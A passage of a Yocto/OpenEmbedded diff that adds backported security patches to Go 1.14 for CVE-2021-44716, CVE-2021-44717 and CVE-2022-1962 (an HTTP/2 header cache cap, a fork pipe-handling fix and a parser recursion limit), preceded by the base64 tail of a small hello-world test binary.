AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABqAEiJ5UiD5PBIi30ISI11EIn6g8IBweIDSAHySInR6wRIg8EISIM5AHX2SIPBCOgiAAAAicfoMgAAAPRBU0yNHafw//9BU/8lvwAAAA8fAP8lvgAAAFVIieVIjT0zAAAA6A0AAAC4AAAAAMnD/yXRAAAA/yXTAAAAAAAATI0dwQAAAOm0////TI0dvQAAAOmo////aGVsbG8sIHdvcmxkAAAAABQAAAAAAAAAAXpSAAF4EAEQDAcIkAEAACwAAAAcAAAAkv////////8XAAAAAAAAAAAEAQAAAA4QhgIEAwAAAA0GAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABDAX/9/AAAIEMBf/38AAAAAAAABAAAAGBAAAAEAAAAQEAAAAQAAAAgQAAABAAAAABAAAAEAAACQDwAAAQAAAJwPAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAHgEAAFAPAAABAAAAGwAAAB4BAABkDwAAAQAAAC4AAAAPBgAAGBAAAAEAAAA2AAAADwYAABAQAAABAAAAPgAAAA8GAAAAEAAAAQAAAEoAAAADABAAAAAAAAEAAABeAAAADwYAAAgQAAABAAAAZwAAAA8BAABqDwAAAQAAAG0AAAAPAQAAFA8AAAEAAABzAAAAAQABAgAAAAAAAAAAeQAAAAEAAQIAAAAAAAAAAAkAAAAKAAAACQAAAAoAAAAgAGR5bGRfc3R1Yl9iaW5kaW5nX2hlbHBlcgBfX2R5bGRfZnVuY19sb29rdXAAX05YQXJnYwBfTlhBcmd2AF9fX3Byb2duYW1lAF9fbWhfZXhlY3V0ZV9oZWFkZXIAX2Vudmlyb24AX21haW4Ac3RhcnQAX2V4aXQAX3B1dHMAAA==
86\ No newline at end of file
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
new file mode 100644
index 0000000000..9c4fee2db4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44716.patch
@@ -0,0 +1,93 @@
1From 9f1860075990e7bf908ca7cc329d1d3ef91741c8 Mon Sep 17 00:00:00 2001
2From: Filippo Valsorda <filippo@golang.org>
3Date: Thu, 9 Dec 2021 06:13:31 -0500
4Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/d0aebe3e74fe14799f97ddd3f01129697c6a290a]
7CVE: CVE-2021-44716
8Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
9
10
11Pull in security fix
12
13 a5309b3 http2: cap the size of the server's canonical header cache
14
15Updates #50058
16Fixes CVE-2021-44716
17
18Change-Id: Ifdd13f97fce168de5fb4b2e74ef2060d059800b9
19Reviewed-on: https://go-review.googlesource.com/c/go/+/370575
20Trust: Filippo Valsorda <filippo@golang.org>
21Run-TryBot: Filippo Valsorda <filippo@golang.org>
22Reviewed-by: Alex Rakoczy <alex@golang.org>
23TryBot-Result: Gopher Robot <gobot@golang.org>
24(cherry picked from commit d0aebe3e74fe14799f97ddd3f01129697c6a290a)
25---
26 src/go.mod | 2 +-
27 src/go.sum | 4 ++--
28 src/net/http/h2_bundle.go | 10 +++++++++-
29 src/vendor/modules.txt | 2 +-
30 4 files changed, 13 insertions(+), 5 deletions(-)
31
32diff --git a/src/go.mod b/src/go.mod
33index ec6bd98..56f2fbb 100644
34--- a/src/go.mod
35+++ b/src/go.mod
36@@ -4,7 +4,7 @@ go 1.14
37
38 require (
39 golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d
40- golang.org/x/net v0.0.0-20210129194117-4acb7895a057
41+ golang.org/x/net v0.0.0-20211209100217-a5309b321dca
42 golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf // indirect
43 golang.org/x/text v0.3.3-0.20191031172631-4b67af870c6f // indirect
44 )
45diff --git a/src/go.sum b/src/go.sum
46index 171e083..1ceba05 100644
47--- a/src/go.sum
48+++ b/src/go.sum
49@@ -2,8 +2,8 @@ golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACk
50 golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d h1:9FCpayM9Egr1baVnV1SX0H87m+XB0B8S0hAMi99X/3U=
51 golang.org/x/crypto v0.0.0-20200128174031-69ecbb4d6d5d/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
52 golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
53-golang.org/x/net v0.0.0-20210129194117-4acb7895a057 h1:HThQeV5c0Ab/Puir+q6mC97b7+3dfZdsLWMLoBrzo68=
54-golang.org/x/net v0.0.0-20210129194117-4acb7895a057/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
55+golang.org/x/net v0.0.0-20211209100217-a5309b321dca h1:UmeWAm8AwB6NA/e4FSaGlK1EKTLXKX3utx4Si+6kfPg=
56+golang.org/x/net v0.0.0-20211209100217-a5309b321dca/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
57 golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
58 golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
59 golang.org/x/sys v0.0.0-20200201011859-915c9c3d4ccf h1:+4j7oujXP478CVb/AFvHJmVX5+Pczx2NGts5yirA0oY=
60diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
61index 702fd5a..83f2a72 100644
62--- a/src/net/http/h2_bundle.go
63+++ b/src/net/http/h2_bundle.go
64@@ -4293,7 +4293,15 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
65 sc.canonHeader = make(map[string]string)
66 }
67 cv = CanonicalHeaderKey(v)
68- sc.canonHeader[v] = cv
69+ // maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
70+ // entries in the canonHeader cache. This should be larger than the number
71+ // of unique, uncommon header keys likely to be sent by the peer, while not
72+ // so high as to permit unreaasonable memory usage if the peer sends an unbounded
73+ // number of unique header keys.
74+ const maxCachedCanonicalHeaders = 32
75+ if len(sc.canonHeader) < maxCachedCanonicalHeaders {
76+ sc.canonHeader[v] = cv
77+ }
78 return cv
79 }
80
81diff --git a/src/vendor/modules.txt b/src/vendor/modules.txt
82index 669bd9b..1d67183 100644
83--- a/src/vendor/modules.txt
84+++ b/src/vendor/modules.txt
85@@ -8,7 +8,7 @@ golang.org/x/crypto/curve25519
86 golang.org/x/crypto/hkdf
87 golang.org/x/crypto/internal/subtle
88 golang.org/x/crypto/poly1305
89-# golang.org/x/net v0.0.0-20210129194117-4acb7895a057
90+# golang.org/x/net v0.0.0-20211209100217-a5309b321dca
91 ## explicit
92 golang.org/x/net/dns/dnsmessage
93 golang.org/x/net/http/httpguts
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
new file mode 100644
index 0000000000..17cac7a5ba
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-44717.patch
@@ -0,0 +1,83 @@
1From 9171c664e7af479aa26bc72f2e7cf4e69d8e0a6f Mon Sep 17 00:00:00 2001
2From: Hitendra Prajapati <hprajapati@mvista.com>
3Date: Fri, 17 Jun 2022 10:22:47 +0530
4Subject: [PATCH] CVE-2021-44717
5
6Upstream-Status: Backport [https://github.com/golang/go/commit/44a3fb49]
7CVE: CVE-2021-44717
8Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
9
10syscall: fix ForkLock spurious close(0) on pipe failure
11Pipe (and therefore forkLockPipe) does not make any guarantees
12about the state of p after a failed Pipe(p). Avoid that assumption
13and the too-clever goto, so that we don't accidentally Close a real fd
14if the failed pipe leaves p[0] or p[1] set >= 0.
15
16Updates #50057
17Fixes CVE-2021-44717
18
19Change-Id: Iff8e19a6efbba0c73cc8b13ecfae381c87600bb4
20Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1291270
21Reviewed-by: Ian Lance Taylor <iant@google.com>
22Reviewed-on: https://go-review.googlesource.com/c/go/+/370514
23Trust: Filippo Valsorda <filippo@golang.org>
24Run-TryBot: Filippo Valsorda <filippo@golang.org>
25TryBot-Result: Gopher Robot <gobot@golang.org>
26Reviewed-by: Alex Rakoczy <alex@golang.org>
27---
28 src/syscall/exec_unix.go | 20 ++++++--------------
29 1 file changed, 6 insertions(+), 14 deletions(-)
30
31diff --git a/src/syscall/exec_unix.go b/src/syscall/exec_unix.go
32index b3798b6..b73782c 100644
33--- a/src/syscall/exec_unix.go
34+++ b/src/syscall/exec_unix.go
35@@ -151,9 +151,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
36 sys = &zeroSysProcAttr
37 }
38
39- p[0] = -1
40- p[1] = -1
41-
42 // Convert args to C form.
43 argv0p, err := BytePtrFromString(argv0)
44 if err != nil {
45@@ -194,14 +191,17 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
46
47 // Allocate child status pipe close on exec.
48 if err = forkExecPipe(p[:]); err != nil {
49- goto error
50+ ForkLock.Unlock()
51+ return 0, err
52 }
53
54 // Kick off child.
55 pid, err1 = forkAndExecInChild(argv0p, argvp, envvp, chroot, dir, attr, sys, p[1])
56 if err1 != 0 {
57- err = Errno(err1)
58- goto error
59+ Close(p[0])
60+ Close(p[1])
61+ ForkLock.Unlock()
62+ return 0, Errno(err1)
63 }
64 ForkLock.Unlock()
65
66@@ -228,14 +228,6 @@ func forkExec(argv0 string, argv []string, attr *ProcAttr) (pid int, err error)
67
68 // Read got EOF, so pipe closed on exec, so exec succeeded.
69 return pid, nil
70-
71-error:
72- if p[0] >= 0 {
73- Close(p[0])
74- Close(p[1])
75- }
76- ForkLock.Unlock()
77- return 0, err
78 }
79
80 // Combination of fork and exec, careful to be thread safe.
81--
822.25.1
83
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
new file mode 100644
index 0000000000..b2ab5d0669
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-1962.patch
@@ -0,0 +1,357 @@
1From ba8788ebcead55e99e631c6a1157ad7b35535d11 Mon Sep 17 00:00:00 2001
2From: Roland Shoemaker <bracewell@google.com>
3Date: Wed, 15 Jun 2022 10:43:05 -0700
4Subject: [PATCH] [release-branch.go1.17] go/parser: limit recursion depth
5
6Limit nested parsing to 100,000, which prevents stack exhaustion when
7parsing deeply nested statements, types, and expressions. Also limit
8the scope depth to 1,000 during object resolution.
9
10Thanks to Juho Nurminen of Mattermost for reporting this issue.
11
12Fixes #53707
13Updates #53616
14Fixes CVE-2022-1962
15
16Change-Id: I4d7b86c1d75d0bf3c7af1fdea91582aa74272c64
17Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1491025
18Reviewed-by: Russ Cox <rsc@google.com>
19Reviewed-by: Damien Neil <dneil@google.com>
20(cherry picked from commit 6a856f08d58e4b6705c0c337d461c540c1235c83)
21Reviewed-on: https://go-review.googlesource.com/c/go/+/417070
22Reviewed-by: Heschi Kreinick <heschi@google.com>
23TryBot-Result: Gopher Robot <gobot@golang.org>
24Run-TryBot: Michael Knyszek <mknyszek@google.com>
25
26Upstream-Status: Backport [https://github.com/golang/go/commit/ba8788ebcead55e99e631c6a1157ad7b35535d11]
27CVE: CVE-2022-1962
28Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
29---
30 src/go/parser/interface.go | 10 ++-
31 src/go/parser/parser.go | 48 ++++++++--
32 src/go/parser/parser_test.go | 169 +++++++++++++++++++++++++++++++++++
33 3 files changed, 220 insertions(+), 7 deletions(-)
34
35diff --git a/src/go/parser/interface.go b/src/go/parser/interface.go
36index 54f9d7b..537b327 100644
37--- a/src/go/parser/interface.go
38+++ b/src/go/parser/interface.go
39@@ -92,8 +92,11 @@ func ParseFile(fset *token.FileSet, filename string, src interface{}, mode Mode)
40 defer func() {
41 if e := recover(); e != nil {
42 // resume same panic if it's not a bailout
43- if _, ok := e.(bailout); !ok {
44+ bail, ok := e.(bailout)
45+ if !ok {
46 panic(e)
47+ } else if bail.msg != "" {
48+ p.errors.Add(p.file.Position(bail.pos), bail.msg)
49 }
50 }
51
52@@ -188,8 +191,11 @@ func ParseExprFrom(fset *token.FileSet, filename string, src interface{}, mode M
53 defer func() {
54 if e := recover(); e != nil {
55 // resume same panic if it's not a bailout
56- if _, ok := e.(bailout); !ok {
57+ bail, ok := e.(bailout)
58+ if !ok {
59 panic(e)
60+ } else if bail.msg != "" {
61+ p.errors.Add(p.file.Position(bail.pos), bail.msg)
62 }
63 }
64 p.errors.Sort()
65diff --git a/src/go/parser/parser.go b/src/go/parser/parser.go
66index 31a7398..586fe90 100644
67--- a/src/go/parser/parser.go
68+++ b/src/go/parser/parser.go
69@@ -64,6 +64,10 @@ type parser struct {
70 unresolved []*ast.Ident // unresolved identifiers
71 imports []*ast.ImportSpec // list of imports
72
73+ // nestLev is used to track and limit the recursion depth
74+ // during parsing.
75+ nestLev int
76+
77 // Label scopes
78 // (maintained by open/close LabelScope)
79 labelScope *ast.Scope // label scope for current function
80@@ -236,6 +240,24 @@ func un(p *parser) {
81 p.printTrace(")")
82 }
83
84+// maxNestLev is the deepest we're willing to recurse during parsing
85+const maxNestLev int = 1e5
86+
87+func incNestLev(p *parser) *parser {
88+ p.nestLev++
89+ if p.nestLev > maxNestLev {
90+ p.error(p.pos, "exceeded max nesting depth")
91+ panic(bailout{})
92+ }
93+ return p
94+}
95+
96+// decNestLev is used to track nesting depth during parsing to prevent stack exhaustion.
97+// It is used along with incNestLev in a similar fashion to how un and trace are used.
98+func decNestLev(p *parser) {
99+ p.nestLev--
100+}
101+
102 // Advance to the next token.
103 func (p *parser) next0() {
104 // Because of one-token look-ahead, print the previous token
105@@ -348,8 +370,12 @@ func (p *parser) next() {
106 }
107 }
108
109-// A bailout panic is raised to indicate early termination.
110-type bailout struct{}
111+// A bailout panic is raised to indicate early termination. pos and msg are
112+// only populated when bailing out of object resolution.
113+type bailout struct {
114+ pos token.Pos
115+ msg string
116+}
117
118 func (p *parser) error(pos token.Pos, msg string) {
119 epos := p.file.Position(pos)
120@@ -1030,6 +1056,8 @@ func (p *parser) parseChanType() *ast.ChanType {
121
122 // If the result is an identifier, it is not resolved.
123 func (p *parser) tryIdentOrType() ast.Expr {
124+ defer decNestLev(incNestLev(p))
125+
126 switch p.tok {
127 case token.IDENT:
128 return p.parseTypeName()
129@@ -1609,7 +1637,13 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
130 }
131
132 x := p.parseUnaryExpr(lhs)
133- for {
134+ // We track the nesting here rather than at the entry for the function,
135+ // since it can iteratively produce a nested output, and we want to
136+ // limit how deep a structure we generate.
137+ var n int
138+ defer func() { p.nestLev -= n }()
139+ for n = 1; ; n++ {
140+ incNestLev(p)
141 op, oprec := p.tokPrec()
142 if oprec < prec1 {
143 return x
144@@ -1628,7 +1662,7 @@ func (p *parser) parseBinaryExpr(lhs bool, prec1 int) ast.Expr {
145 // The result may be a type or even a raw type ([...]int). Callers must
146 // check the result (using checkExpr or checkExprOrType), depending on
147 // context.
148-func (p *parser) parseExpr(lhs bool) ast.Expr {
149+func (p *parser) parseExpr(lhs bool) ast.Expr {
150 if p.trace {
151 defer un(trace(p, "Expression"))
152 }
153@@ -1899,6 +1933,8 @@ func (p *parser) parseIfHeader() (init ast.Stmt, cond ast.Expr) {
154 }
155
156 func (p *parser) parseIfStmt() *ast.IfStmt {
157+ defer decNestLev(incNestLev(p))
158+
159 if p.trace {
160 defer un(trace(p, "IfStmt"))
161 }
162@@ -2214,6 +2250,8 @@ func (p *parser) parseForStmt() ast.Stmt {
163 }
164
165 func (p *parser) parseStmt() (s ast.Stmt) {
166+ defer decNestLev(incNestLev(p))
167+
168 if p.trace {
169 defer un(trace(p, "Statement"))
170 }
171diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
172index 25a374e..37a6a2b 100644
173--- a/src/go/parser/parser_test.go
174+++ b/src/go/parser/parser_test.go
175@@ -10,6 +10,7 @@ import (
176 "go/ast"
177 "go/token"
178 "os"
179+ "runtime"
180 "strings"
181 "testing"
182 )
183@@ -569,3 +570,171 @@ type x int // comment
184 t.Errorf("got %q, want %q", comment, "// comment")
185 }
186 }
187+
188+var parseDepthTests = []struct {
189+ name string
190+ format string
191+ // multipler is used when a single statement may result in more than one
